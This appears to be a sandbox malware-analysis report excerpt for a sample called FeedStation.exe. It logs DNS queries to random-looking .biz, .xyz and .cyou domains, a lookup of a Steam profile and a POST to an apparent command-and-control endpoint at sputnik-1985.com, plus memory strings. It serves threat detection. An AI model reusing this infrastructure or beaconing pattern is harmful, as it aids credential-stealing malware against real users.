HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=5c7a4220af3eb1b5130a8937; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35126Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveFri, 10 Jan 2025 10:59:14 GMTDateProxy-Connect equals www.youtube.com (Youtube)
Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: ingreem-eilish.biz
Source: global traffic	DNS traffic detected: DNS query: immureprech.biz
Source: global traffic	DNS traffic detected: DNS query: deafeninggeh.biz
Source: global traffic	DNS traffic detected: DNS query: effecterectz.xyz
Source: global traffic	DNS traffic detected: DNS query: diffuculttan.xyz
Source: global traffic	DNS traffic detected: DNS query: debonairnukk.xyz
Source: global traffic	DNS traffic detected: DNS query: wrathful-jammy.cyou
Source: global traffic	DNS traffic detected: DNS query: awake-weaves.cyou
Source: global traffic	DNS traffic detected: DNS query: sordid-snaked.cyou
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: sputnik-1985.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com

Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: FeedStation.exe, 00000000.00000003.2359347102.0000000003893000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: FeedStation.exe, 00000000.00000003.2359347102.0000000003893000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: FeedStation.exe, 00000000.00000003.2359347102.0000000003893000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: FeedStation.exe, 00000000.00000003.2359347102.0000000003893000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: FeedStation.exe, 00000000.00000003.2359347102.0000000003893000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: FeedStation.exe, 00000000.00000003.2359347102.0000000003893000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: FeedStation.exe, 00000000.00000003.2359347102.0000000003893000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: FeedStation.exe, 00000000.00000003.2359347102.0000000003893000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: FeedStation.exe, 00000000.00000003.2359347102.0000000003893000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: FeedStation.exe	String found in binary or memory: http://www.bradsoft.com/feeddemon/help/3.0/enclosures/
Source: FeedStation.exe	String found in binary or memory: http://www.newsgator.com/
Source: FeedStation.exe	String found in binary or memory: http://www.newsgator.com/U
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: FeedStation.exe, 00000000.00000003.2359347102.0000000003893000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: FeedStation.exe, 00000000.00000003.2359347102.0000000003893000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: FeedStation.exe, 00000000.00000003.2332734644.000000000381A000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332537156.0000000003818000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332414351.000000000381B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: FeedStation.exe, 00000000.00000003.2332734644.000000000381A000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332537156.0000000003818000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332414351.000000000381B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: FeedStation.exe, 00000000.00000003.2332734644.000000000381A000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332537156.0000000003818000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332414351.000000000381B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: FeedStation.exe, 00000000.00000003.2332734644.000000000381A000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332537156.0000000003818000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332414351.000000000381B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/
Source: FeedStation.exe, 00000000.00000003.2320868917.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=SCXpgixTDzt4&a
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: FeedStation.exe, 00000000.00000003.2320868917.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: FeedStation.exe, 00000000.00000003.2320868917.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: FeedStation.exe, 00000000.00000003.2320868917.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_A
Source: FeedStation.exe, 00000000.00000003.2320868917.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=aep8
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=VsdTzPa1YF_Y&l=e
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: FeedStation.exe, 00000000.00000003.2332537156.0000000003818000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332414351.000000000381B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: FeedStation.exe, 00000000.00000003.2332537156.0000000003818000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332414351.000000000381B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: FeedStation.exe, 00000000.00000003.2332537156.0000000003818000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332414351.000000000381B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/
Source: FeedStation.exe, 00000000.00000002.2416982397.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2411461978.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2410786565.0000000000A8C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/.
Source: FeedStation.exe, 00000000.00000003.2320951105.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/.mgmd
Source: FeedStation.exe, 00000000.00000003.2320951105.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2411461978.0000000000A7F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/api
Source: FeedStation.exe, 00000000.00000003.2400537991.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000002.2417006153.0000000000A96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/api#
Source: FeedStation.exe, 00000000.00000003.2320951105.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/api2
Source: FeedStation.exe, 00000000.00000003.2412499112.00000000037E3000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2400514499.00000000037E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/api6C
Source: FeedStation.exe, 00000000.00000003.2320951105.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/apim
Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com:443/api
Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: FeedStation.exe, 00000000.00000003.2410786565.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000002.2416072226.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2411461978.00000000009FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: FeedStation.exe, 00000000.00000003.2320868917.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: FeedStation.exe, 00000000.00000003.2320951105.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: FeedStation.exe, 00000000.00000003.2320951105.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
